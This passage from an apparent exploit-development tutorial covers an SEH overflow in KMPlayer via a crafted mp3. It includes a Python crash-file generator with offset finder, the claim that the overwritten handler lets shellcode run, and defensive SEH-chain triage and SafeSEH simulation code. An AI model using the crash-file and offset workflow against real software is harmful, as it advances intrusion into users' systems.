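    if length > MAX_PATTERN_LEN:
        raise ValueError("pattern longer than %d bytes would repeat" % MAX_PATTERN_LEN)
    triples = []
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                 string.ascii_lowercase,
                                                 string.digits):
        triples.append(upper + lower + digit)
        if len(triples) * 3 >= length:
            break
    return "".join(triples)[:length].encode("ascii")


def pattern_offset(pattern, needle):
    """Offset of the byte string `needle` inside `pattern`, or -1 if absent."""
    return pattern.find(needle)


def offset_from_register(pattern, value, base=0):
    """Map a 32-bit register value as shown by the debugger (e.g. EIP=0x41326141)
    to the offset of the bytes that produced it. x86 is little-endian, so the
    register displays the four bytes reversed; to_bytes(..., "little") undoes
    that. `base` is added so the result can be a file offset rather than a
    pattern offset (pass len(header))."""
    idx = pattern_offset(pattern, value.to_bytes(4, "little"))
    if idx == -1:
        return -1
    return base + idx


def build_payload(header, field_len):
    """header + cyclic pattern of field_len bytes; returns (payload, pattern)."""
    pattern = pattern_create(field_len)
    return header + pattern, pattern


def write_crash_file(path, payload):
    """Write the payload in binary mode (as the fixed script above does)."""
    with open(path, "wb") as fh:
        fh.write(payload)
    return len(payload)


if __name__ == "__main__":
    payload, pattern = build_payload(SAMPLE_HEADER, 5000)
    write_crash_file("kmp_pattern.mp3", payload)
    # After the crash, feed in the register value the debugger shows.
    # 0x41326141 is the little-endian view of "Aa2A", pattern offset 6.
    print("pattern offset:", offset_from_register(pattern, 0x41326141))
    print("file offset:   ", offset_from_register(pattern, 0x41326141, len(SAMPLE_HEADER)))
```

<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Run it, open kmp_pattern.mp3 in the player under a debugger, and pass the faulting register value to offset_from_register; a return of -1 means the register holds something other than four consecutive pattern bytes (for example a pointer into the pattern rather than the pattern itself), which is itself a useful hint about what kind of corruption the oversized field causes.</div>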
<div style="font-family: inherit;"><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="267"> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--><span style="font-size: 11pt;">Run KMPlayer, attach it to Immunity Debugger and open the malicious mp3 file in KMPlayer.</span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-sZYw8z8MVc4/Tgwk3Uw6gBI/AAAAAAAAAVI/CQRyB7B-Ho0/s1600/basic-crash.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://1.bp.blogspot.com/-sZYw8z8MVc4/Tgwk3Uw6gBI/AAAAAAAAAVI/CQRyB7B-Ho0/s400/basic-crash.JPG" width="400" /></a></div><br />
<!--[if gte mso 9]><xml> <w:LatentStyles> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> </w:LatentStyles> </xml><![endif]--><span style="font-size: 11pt;">KMPlayer crashes with EIP overwritten with 41414141. This is what the exploits mentioned earlier already exploit. Let's check the SEH chain: go to "View" and select "SEH".</span><br />
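What the debugger's SEH view is doing for us here is walking the chain of EXCEPTION_REGISTRATION records on the stack, each one a pair of {next record pointer, handler pointer}, until it reaches the 0xFFFFFFFF end marker. The following crash-triage script is an added example, not code from this post or from KMPlayer: it walks that chain over a captured stack slice and flags records whose handler or next pointer has been replaced by a repeated filler byte such as 0x41 ("A"). The stack contents, the base address 0x0012F000, the record addresses and the handler value 0x7C80ABCD are all constructed for the example.

```python
import struct

END_OF_CHAIN = 0xFFFFFFFF  # "next" value that terminates the SEH chain


def read_dword(stack: bytes, base: int, addr: int) -> int:
    """Read a little-endian 32-bit value at virtual address addr from the captured stack slice."""
    off = addr - base
    if off < 0 or off + 4 > len(stack):
        raise ValueError(f"{addr:#010x} lies outside the captured stack")
    return struct.unpack_from("<I", stack, off)[0]


def walk_seh_chain(stack: bytes, base: int, head: int, max_records: int = 64) -> list:
    """Follow {next, handler} records starting at head, the way a debugger's SEH view does."""
    records, seen, addr = [], set(), head
    while addr != END_OF_CHAIN and len(records) < max_records:
        if addr in seen:
            records.append({"addr": addr, "next": None, "handler": None,
                            "note": "chain loops back on itself"})
            break
        seen.add(addr)
        try:
            nxt = read_dword(stack, base, addr)
            handler = read_dword(stack, base, addr + 4)
        except ValueError as exc:
            # A next pointer leading off the stack is itself a sign of corruption.
            records.append({"addr": addr, "next": None, "handler": None, "note": str(exc)})
            break
        records.append({"addr": addr, "next": nxt, "handler": handler, "note": ""})
        addr = nxt
    return records


def is_printable_fill(value: int) -> bool:
    """True for values such as 0x41414141 that are a single printable byte repeated four times."""
    b = value.to_bytes(4, "little")
    return len(set(b)) == 1 and 0x20 <= b[0] <= 0x7E


def triage_chain(records: list, base: int, size: int) -> list:
    """Return (record address, reason) pairs pointing at a corrupted SEH chain."""
    findings = []
    for r in records:
        if r["handler"] is None:
            findings.append((r["addr"], r["note"]))
            continue
        if is_printable_fill(r["handler"]):
            findings.append((r["addr"], f"handler {r['handler']:#010x} is printable fill (overwritten)"))
        elif base <= r["handler"] < base + size:
            # A legitimate handler lives in a module, never on the stack itself.
            findings.append((r["addr"], f"handler {r['handler']:#010x} points into the stack"))
        if r["next"] != END_OF_CHAIN and is_printable_fill(r["next"]):
            findings.append((r["addr"], f"next pointer {r['next']:#010x} is printable fill (overwritten)"))
    return findings


def build_sample_stack():
    """Constructed sample: a 4 KiB stack slice with one intact record and one overwritten record."""
    base, size = 0x0012F000, 0x1000
    stack = bytearray(size)
    rec_a, rec_b = 0x0012F100, 0x0012F800
    # Intact record: next -> rec_b, handler -> a made-up module address (constructed, not real).
    struct.pack_into("<II", stack, rec_a - base, rec_b, 0x7C80ABCD)
    # Overwritten record: both fields smashed with "AAAA", as after a long filler string.
    struct.pack_into("<II", stack, rec_b - base, 0x41414141, 0x41414141)
    return bytes(stack), base, size, rec_a


if __name__ == "__main__":
    stack, base, size, head = build_sample_stack()
    recs = walk_seh_chain(stack, base, head)
    for addr, reason in triage_chain(recs, base, size):
        print(f"{addr:#010x}: {reason}")
```

Run against the constructed snapshot, the walker stops after three records: the intact one, the record whose next and handler both read 0x41414141, and a dead end because 0x41414141 is not a stack address. That is exactly the pattern to look for in the SEH view after a crash like the one above: a handler field that is filler rather than a module address.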
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-x0Kf1Ep5V2k/Tgwk3pRVFQI/AAAAAAAAAVM/8W49pYEwv-A/s1600/basic-crash-seh.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-x0Kf1Ep5V2k/Tgwk3pRVFQI/AAAAAAAAAVM/8W49pYEwv-A/s400/basic-crash-seh.JPG" width="400" /></a></div><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--><span style="font-family: Calibri, sans-serif; font-size: 11.0pt;">The SEH handler also gets overwritten with 41414141, which is user-specified input. An attacker can execute malicious code by pointing this SEH handler at an address of his/her choice where the malicious code (shellcode) has been placed in memory.</span><br />
<br />
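To make the mechanism above concrete from the defender's side, here is an added example (not code from the original post) that simulates in portable C how an overlong copy clobbers the SEH record sitting directly above a stack buffer, and then applies the two checks Windows uses to stop such a handler from ever running: SafeSEH (the handler address must be in the module's registered table) and SEHOP (the record chain must still walk to the final handler). The frame layout, every address and the SafeSEH table are constructed for the simulation.

```c
/*
 * Added example, not code from the original post: a portable simulation of how an
 * overlong copy into a stack buffer clobbers the SEH record above it (the post's
 * 41414141), and of the two checks (SafeSEH, SEHOP) that decide whether such a
 * handler would ever be called. Every address and table below is constructed.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Shape of a 32-bit _EXCEPTION_REGISTRATION_RECORD: Next pointer, then Handler. */
typedef struct {
    uint32_t next;     /* address of the next record; CHAIN_END terminates the chain */
    uint32_t handler;  /* address of the handler the dispatcher would call */
} seh_record_t;

/* Constructed frame: a fixed buffer directly below an SEH record, as on the real stack. */
typedef struct {
    char buffer[16];
    seh_record_t seh;
} frame_t;

#define CHAIN_END           0xFFFFFFFFu
#define STACK_BASE          0x0012F000u  /* constructed address of mem[0] in run_scenario */
#define FINAL_HANDLER_ADDR  0x7C9032BCu  /* constructed stand-in for the process's final handler */
#define GOOD_HANDLER_ADDR   0x00401000u  /* constructed handler that the loader registered */

/* Constructed SafeSEH table: the only handler addresses the module registered. */
static const uint32_t safeseh_table[] = { GOOD_HANDLER_ADDR, 0x00402230u, FINAL_HANDLER_ADDR };

/* Unbounded copy into the buffer: the class of defect behind the post's crash. Bytes run
 * from buffer[0] through seh.next and then seh.handler. Returns how many bytes spilled. */
size_t unsafe_copy(frame_t *f, const char *input, size_t len) {
    if (len > sizeof(*f)) len = sizeof(*f);      /* keep the simulation inside the struct */
    memcpy((unsigned char *)f, input, len);
    return len > sizeof(f->buffer) ? len - sizeof(f->buffer) : 0;
}

/* SafeSEH: the dispatcher only calls handlers found in the owning module's table. */
int safeseh_allows(uint32_t handler) {
    for (size_t i = 0; i < sizeof(safeseh_table) / sizeof(safeseh_table[0]); i++)
        if (safeseh_table[i] == handler) return 1;
    return 0;
}

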